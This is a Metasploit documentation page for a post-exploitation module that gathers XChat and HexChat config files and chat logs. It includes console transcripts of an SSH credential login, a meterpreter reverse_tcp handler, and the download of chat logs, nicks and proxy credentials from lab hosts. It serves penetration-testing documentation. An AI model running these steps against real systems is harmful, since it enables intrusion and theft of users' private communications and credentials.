CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/post/multi/gather/enum_hexchat.md
Views: 1904
Vulnerable Application
This module enumerates the config and log files for XChat and HexChat. XChat was retired in 2015, although the site and downloads are still available in April 2020. It was forked and replaced by HexChat.
Linux xchat path:
/home/[username]/.xchat2/ * /home/[username]/.xchat2/servlist_.conf * /home/[username]/.xchat2/xchat.conf * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log
Linux hexchat path:
/home/[username]/.config/hexchat/ * /home/[username]/.config/hexchat/servlist.conf * /home/[username]/.config/hexchat/hexchat.conf * /home/[username]/.config/hexchat/logs/FreeNode/Freenode-#aha.log
Verification Steps
Install the application(s)
Start msfconsole
Get a shell
Do:
use post/multi/gather/enum_hexchatDo:
set session #Do:
runYou should get config and log files depending on your action
Actions
ALL
Download both config and chat logs. Default.
CHATS
Only download the chat logs.
CONFIGS
Only download the config files.
Options
HEXCHAT
Gather the files from HexChat. Default true.
XCHAT
Gather the files from XCHat. Default false.
Scenarios
Hexchat 2.14.3 on Fedora 31
``` [*] Processing xchat.rb for ERB directives. resource (xchat.rb)> use auxiliary/scanner/ssh/ssh_login resource (xchat.rb)> set username fedora username => fedora resource (xchat.rb)> set password fedora password => fedora resource (xchat.rb)> set rhosts 2.2.2.2 rhosts => 2.2.2.2 resource (xchat.rb)> run [+] 2.2.2.2:22 - Success: 'fedora:fedora' '' [*] Command shell session 1 opened (1.1.1.1:40023 -> 2.2.2.2:22) at 2020-04-22 07:17:59 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed resource (xchat.rb)> use post/linux/gather/enum_hexchat resource (xchat.rb)> set session -1 session => -1 resource (xchat.rb)> set verbose true verbose => true resource (xchat.rb)> run [!] SESSION may not be compatible with this module. [*] Detcted username: fedora [+] Downloading: /home/fedora/.config/hexchat/servlist.conf [+] Downloading: /home/fedora/.config/hexchat/hexchat.conf [+] IRC nick: test14123251232151 [+] IRC nick1: test1251212123151 [+] IRC nick2: test123123123 [+] IRC nick3: test321321321 [+] Proxy conf: 1.1.1.1:9999 -> proxyusername/proxypass [*] Downloading: /home/fedora/.config/hexchat//logs/freenode/freenode.log [*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#postgresql.log [*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#python-unregistered.log [*] Downloading: /home/fedora/.config/hexchat//logs/freenode/server.log [*] Downloading: /home/fedora/.config/hexchat//logs/NETWORK/server.log [+] servlist.conf saved as /home/h00die/.msf4/loot/20200422071815_default_2.2.2.2_hexchat.config_359863.txt [+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.config_347758.txt [+] freenode.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_364082.txt [+] #postgresql.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_991489.txt [+] #python-unregistered.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_760685.txt [+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_022702.txt [+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_433357.txt [*] Post module execution completed ```
Hexchat 2.14.2 and XChat 2.8.9 on Windows 10
``` [*] Processing xchat_win.rb for ERB directives. resource (xchat_win.rb)> use exploit/multi/handler resource (xchat_win.rb)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (xchat_win.rb)> set lhost 1.1.1.1 lhost => 1.1.1.1 resource (xchat_win.rb)> set lport 8888 lport => 8888 resource (xchat_win.rb)> run [*] Started reverse TCP handler on 1.1.1.1:8888 [*] Sending stage (180291 bytes) to 3.3.3.3 [*] Meterpreter session 1 opened (1.1.1.1:8888 -> 3.3.3.3:51475) at 2020-04-22 10:30:29 -0400 meterpreter > background [*] Backgrounding session 1... resource (xchat_win.rb)> use post/multi/gather/enum_hexchat resource (xchat_win.rb)> set session -1 session => -1 resource (xchat_win.rb)> set xchat true xchat => true resource (xchat_win.rb)> set verbose true verbose => true msf5 post(multi/gather/enum_hexchat) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. [+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\servlist_.conf [+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\xchat.conf [+] IRC nick: IEUser [+] IRC nick1: IEUser [+] IRC nick2: IEUser_ [+] IRC nick3: IEUser__ [*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log [+] servlist_.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_408737.txt [+] xchat.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_505296.txt [+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_472281.txt [+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_133017.txt [+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_238039.txt [+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_482558.txt [+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_379409.txt [+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\servlist.conf [+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\hexchat.conf [+] IRC nick: IEUser [+] IRC nick1: IEUser [+] IRC nick2: IEUser_ [+] IRC nick3: IEUser__ [*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log [*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log [+] servlist.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_618512.txt [+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_765571.txt [+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_007334.txt [+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_199140.txt [+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_988553.txt [+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_851506.txt [+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_819165.txt [*] Post module execution completed ```